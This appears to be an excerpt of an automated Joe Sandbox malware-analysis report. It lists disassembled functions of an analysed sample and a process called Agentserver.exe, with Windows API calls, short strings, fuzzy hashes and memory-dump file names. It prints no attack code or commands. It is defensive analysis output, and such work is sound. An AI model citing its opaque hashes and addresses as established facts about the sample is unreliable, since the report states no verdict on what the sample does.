Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: 7e99ff1237bb0085ba3e9c1dd9e75281b73c1ade7bcf73677e012bbccfe4b202
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: 93C048A8104E40F81C233AB222426BF0B441C62BC4BD360C2E8801F713EE060A1AE033

Function 00389F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00389DF1: GetDC.USER32(00000000), ref: 00389DF5
Part of subcall function 00389DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00389E00
Part of subcall function 00389DF1: ReleaseDC.USER32(00000000,00000000), ref: 00389E0B

GetObjectW.GDI32(?,00000018,?), ref: 00389F8D

Part of subcall function 0038A1E5: GetDC.USER32(00000000), ref: 0038A1EE
Part of subcall function 0038A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0038A21D
Part of subcall function 0038A1E5: ReleaseDC.USER32(00000000,?), ref: 0038A2B5

Strings

(, xrefs: 0038A0A3

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 3eb7509192bef932d10326e0ce2054ed228025073c8651540800076299c6c696
Instruction ID: 5f9d768cc95577eabe0707b775571fb85a27504ed3dcecf71b41d553e4a51fde
Opcode Fuzzy Hash: 3eb7509192bef932d10326e0ce2054ed228025073c8651540800076299c6c696
Instruction Fuzzy Hash: 35812371208704AFD716DF28DC44A6ABBE9FF89704F00495EF98AD7260CB34AD05CB62

Function 00380E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00380FF1

Strings

%s: %s, xrefs: 00381000
%ls, xrefs: 00380E76, 00380E8C

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: b5ed9ebdb7af44200f5ff09ca4dcbde87eb563e4cd779537a2a7411991a45f61
Instruction ID: 4c6718f11bc399b2dfd46327eb77fc8306e688a4d07aee4a1feeaeea91ad265e
Opcode Fuzzy Hash: b5ed9ebdb7af44200f5ff09ca4dcbde87eb563e4cd779537a2a7411991a45f61
Instruction Fuzzy Hash: 0251A67514CB00FAFA773AA4CD03F37766DAB14B00F208987B7DA78CD5C69265586712

Function 0039A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0039AA84

Part of subcall function 00398849: IsProcessorFeaturePresent.KERNEL32(00000017,00398838,00000050,003A3958,?,0037CFE0,00000004,003B0EE8,?,?,00398845,00000000,00000000,00000000,00000000,00000000), ref: 0039884B
Part of subcall function 00398849: GetCurrentProcess.KERNEL32(C0000417,003A3958,00000050,003B0EE8), ref: 0039886D
Part of subcall function 00398849: TerminateProcess.KERNEL32(00000000), ref: 00398874

Strings

., xrefs: 0039AC3B
*?, xrefs: 0039A95B

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction ID: 6dc3c7d9c3230c8e352d40007ad1bbe15768a0defbc0662b3b6667ba2586262b
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: 1E519171E0050AAFDF16CFA8C981AADB7B5FF58314F258269E854EB340E7319E01CB91

Function 0037772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00377730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003778CC

Part of subcall function 0037A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0037A27A,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A458
Part of subcall function 0037A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0037A27A,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A489

Strings

:, xrefs: 003777A1

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 440bcdf93fb6a676f96786ea69b4a9f5913f7c4cceeae5e7b305af9faceb72a7
Instruction ID: 279c50fe3d9df0d2aa813fc607dce298909ee4cd8913b5c2d8c44b699546a4de
Opcode Fuzzy Hash: 440bcdf93fb6a676f96786ea69b4a9f5913f7c4cceeae5e7b305af9faceb72a7
Instruction Fuzzy Hash: 73416171804258AADB36EB50CD56EEEB37CAF45300F00C19AB60DA7092DB785F84DF62

Function 0037B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 0037B6BE, 0037B6FA, 0037B75B, 0037B7AE
UNC, xrefs: 0037B708

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 8112d5e76d8fbf9385b3c6e355b7f464b53c5e7a7f640b90c1acee02dfdd8745
Instruction ID: 1fb9213ff35d46763e337a34872aa8722e174cc8a088a3d1851d6fb1fd129a4b
Opcode Fuzzy Hash: 8112d5e76d8fbf9385b3c6e355b7f464b53c5e7a7f640b90c1acee02dfdd8745
Instruction Fuzzy Hash: 3F417F35800299AACF33AF21DC41FEBB7BDAF45750B11C465F82CAB152E778DA45CA60

Function 00388FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00388FC4

Strings

Shell.Explorer, xrefs: 00388FEF
about:blank, xrefs: 00389082

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 59aad33e91ae2b7dd4a221aba7daa43d2b9c15d4999e2989ab5d77cb49ea04d6
Instruction ID: 207143da2658f6756d7373f1e10bbf9236fab3680134a55a2c7e2f6cc7e9c645
Opcode Fuzzy Hash: 59aad33e91ae2b7dd4a221aba7daa43d2b9c15d4999e2989ab5d77cb49ea04d6
Instruction Fuzzy Hash: FC2165712143049FCB0ABF64D895B7A77A9FF45711B1985AEF9099F282DB74EC00CB60

Function 0038D44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010432,0038A990,?,?), ref: 0038D4C5

Strings

GETPASSWORD1, xrefs: 0038D4BA
xj<, xrefs: 0038D4D5

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xj<
API String ID: 665744214-1985457453
Opcode ID: 3842af73d4477cd2da378127822d50177bd30310cb40d3dea5239b2e960c3118
Instruction ID: bd44ca13405f21cf34d2a584e0766c4070cf9f2c70bb8f87c3afc39c60598ecd
Opcode Fuzzy Hash: 3842af73d4477cd2da378127822d50177bd30310cb40d3dea5239b2e960c3118
Instruction Fuzzy Hash: 941126716143486BDB23EE359C02BEB379CB70A315F0581A6FE49AB191CBB4AC40D760

Function 0037EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0037EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0037EB92
Part of subcall function 0037EB73: GetProcAddress.KERNEL32(003B81C0,CryptUnprotectMemory), ref: 0037EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0037EBEC), ref: 0037EC84

Strings

CryptProtectMemory failed, xrefs: 0037EC3B
CryptUnprotectMemory failed, xrefs: 0037EC7C

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: aa18c22e62c41cfb1d6bceda658b819f0552751b98be4e9f2679057f3b332f6c
Instruction ID: f62d501dd977ac4a259e579db2f07cad33a679157be7351afdbe951f053965a9
Opcode Fuzzy Hash: aa18c22e62c41cfb1d6bceda658b819f0552751b98be4e9f2679057f3b332f6c
Instruction Fuzzy Hash: 20113635A056266BDB279B24DD46AAE3B1CEF09714F05C199F80A6F281CB399E418BD0

Function 00399B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00399BBE
_free.LIBCMT ref: 00399BE4

Strings

X:, xrefs: 00399C4B

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free
String ID: X:
API String ID: 269201875-423137811
Opcode ID: bed15e9ef23a4a0d12705658354d886b4f0b6b582186202d3e636ebb1a75281d
Instruction ID: 2918fe2830375114d9f3f69b7ce2d1ac21d0e74f7463831180f447f19e07f093
Opcode Fuzzy Hash: bed15e9ef23a4a0d12705658354d886b4f0b6b582186202d3e636ebb1a75281d
Instruction Fuzzy Hash: BE119871B02611ABEF229B7CBC41B5637D9AB55730F160A2BF521CF1D0E7B5D8418680

Function 0038EC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0038F25E
___raise_securityfailure.LIBCMT ref: 0038F345

Strings

8=, xrefs: 0038F340

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8=
API String ID: 3761405300-956260198
Opcode ID: 6a5b1e36070da0639525bb9ee7af7791c30d6838d7bfebefa322179e91fb4f11
Instruction ID: e833ab16c1d8a4cc2f6db0e886a07a63b2b34553fde14cb263aca5a831fc9334
Opcode Fuzzy Hash: 6a5b1e36070da0639525bb9ee7af7791c30d6838d7bfebefa322179e91fb4f11
Instruction Fuzzy Hash: EC2137B9912B048FD75AEF64F9817547BADFB49B10F10582BE9088B3B0E3B19980CF45

Function 00380889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,003809D0,?,00000000,00000000), ref: 003808AD
SetThreadPriority.KERNEL32(?,00000000), ref: 003808F4

Part of subcall function 00376E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00376EAF

Strings

CreateThread failed, xrefs: 003808B9

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 4dca462a0a42b396bc961a3e0ccc6689d3fe2d7cc68d95700aab6a157f331435
Instruction ID: 771b05c7fe0cdbd25c9aa4e05f22b6a5ffbd051b96901cc0253b87c6796de8dc
Opcode Fuzzy Hash: 4dca462a0a42b396bc961a3e0ccc6689d3fe2d7cc68d95700aab6a157f331435
Instruction Fuzzy Hash: 5201D6B53443056FE62BBF54EC86BA67398EB41715F10046DF68696180CAA1A8849764

Function 0039B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00398FA5: GetLastError.KERNEL32(?,003B0EE8,00393E14,003B0EE8,?,?,00393713,00000050,?,003B0EE8,00000200), ref: 00398FA9
Part of subcall function 00398FA5: _free.LIBCMT ref: 00398FDC
Part of subcall function 00398FA5: SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 0039901D
Part of subcall function 00398FA5: _abort.LIBCMT ref: 00399023

_abort.LIBCMT ref: 0039B2E0
_free.LIBCMT ref: 0039B314

Strings

:, xrefs: 0039B30B

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: :
API String ID: 289325740-3499768093
Opcode ID: 580a6bad30245e344e1f9647152330f34b8414e222877069d41e7479d2ff8ecd
Instruction ID: 881155996e94f758a74b92915c0b281ee3899ec315d618eb7d65ec0dac4bf9a9
Opcode Fuzzy Hash: 580a6bad30245e344e1f9647152330f34b8414e222877069d41e7479d2ff8ecd
Instruction Fuzzy Hash: 2C019236D11625DFCF23EF59A94125EF364FF5AB21F1A060AE4606B681CB306D418FC2

Function 0037130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0037DA98: _swprintf.LIBCMT ref: 0037DABE
Part of subcall function 0037DA98: _strlen.LIBCMT ref: 0037DADF
Part of subcall function 0037DA98: SetDlgItemTextW.USER32(?,003AE154,?), ref: 0037DB3F
Part of subcall function 0037DA98: GetWindowRect.USER32(?,?), ref: 0037DB79
Part of subcall function 0037DA98: GetClientRect.USER32(?,?), ref: 0037DB85

GetDlgItem.USER32(00000000,00003021), ref: 0037134F
SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365

Strings

0, xrefs: 0037130E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: a189d27414b7e5b60bc0c29e3f8d58b2265a1c322ca340faba80fbcae011737e
Instruction ID: ab1f79822b886bb371bfd08e752f4a95eb90bf098b88ea9f208dae0845dac721
Opcode Fuzzy Hash: a189d27414b7e5b60bc0c29e3f8d58b2265a1c322ca340faba80fbcae011737e
Instruction Fuzzy Hash: 1DF08C3A10024CAAEF770F689809BEA3BA8BF21705F09C018FD5D549A1C77CC995EE10

Function 0038084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00380A78,?), ref: 00380854
GetLastError.KERNEL32(?), ref: 00380860

Part of subcall function 00376E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00376EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00380869

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: f0f8d5a269880bef440033bed0087bc7be8b81f063d07ea4182d979f1b4be55e
Instruction ID: ed443eef50e4754bfe945db68b11e475842cee5fc85bd5354df206aaffba5826
Opcode Fuzzy Hash: f0f8d5a269880bef440033bed0087bc7be8b81f063d07ea4182d979f1b4be55e
Instruction Fuzzy Hash: F8D05E35A086212ACA273764AC0BEEF7A099F53730F204714F23E691F5DB25099186E6

Function 0037DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0037D32F,?), ref: 0037DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0037D32F,?), ref: 0037DA61

Strings

RTL, xrefs: 0037DA5B

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: dc8a1dc76758d6426c0bc8704b64f249824f305fb7d8eb264358a1d5b5062ba0
Instruction ID: c31bb65642da44d72b0acf33ccf7fe3e411a5c72693dfa230a54bfe41701928d
Opcode Fuzzy Hash: dc8a1dc76758d6426c0bc8704b64f249824f305fb7d8eb264358a1d5b5062ba0
Instruction Fuzzy Hash: B6C01232289350B6EB3267306C0EB837A5CAB12B12F0A044CF246DA1D0DAE9CA4087A1

Analysis Process: Agentserver.exePID: 3356, Parent PID: 3372COMMON

Executed Functions

Function 00007FF848E8F0A6 Relevance: 8.9, Strings: 7, Instructions: 153COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848E8F0C8
!, xrefs: 00007FF848E8ED2D
8, xrefs: 00007FF848E8F633
i, xrefs: 00007FF848E8F6B6
Y, xrefs: 00007FF848E8F949
\, xrefs: 00007FF848E8F0BB
1, xrefs: 00007FF848E8FB1A

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: !$1$8$Y$\$_$i
API String ID: 0-1737076053
Opcode ID: e0156c3131a1d070a0dd178b71b9e40db8af0538a5342c2b5453fa407461df4e
Instruction ID: bd3abc6e67549af35174ec07fcaa2e9055964edc582072cd597c540766762c3f
Opcode Fuzzy Hash: e0156c3131a1d070a0dd178b71b9e40db8af0538a5342c2b5453fa407461df4e
Instruction Fuzzy Hash: 5071B470D0866ACFEBA8EF14C8987ADB7B1BF54341F5041EAD40EA7291CB785A84DF14

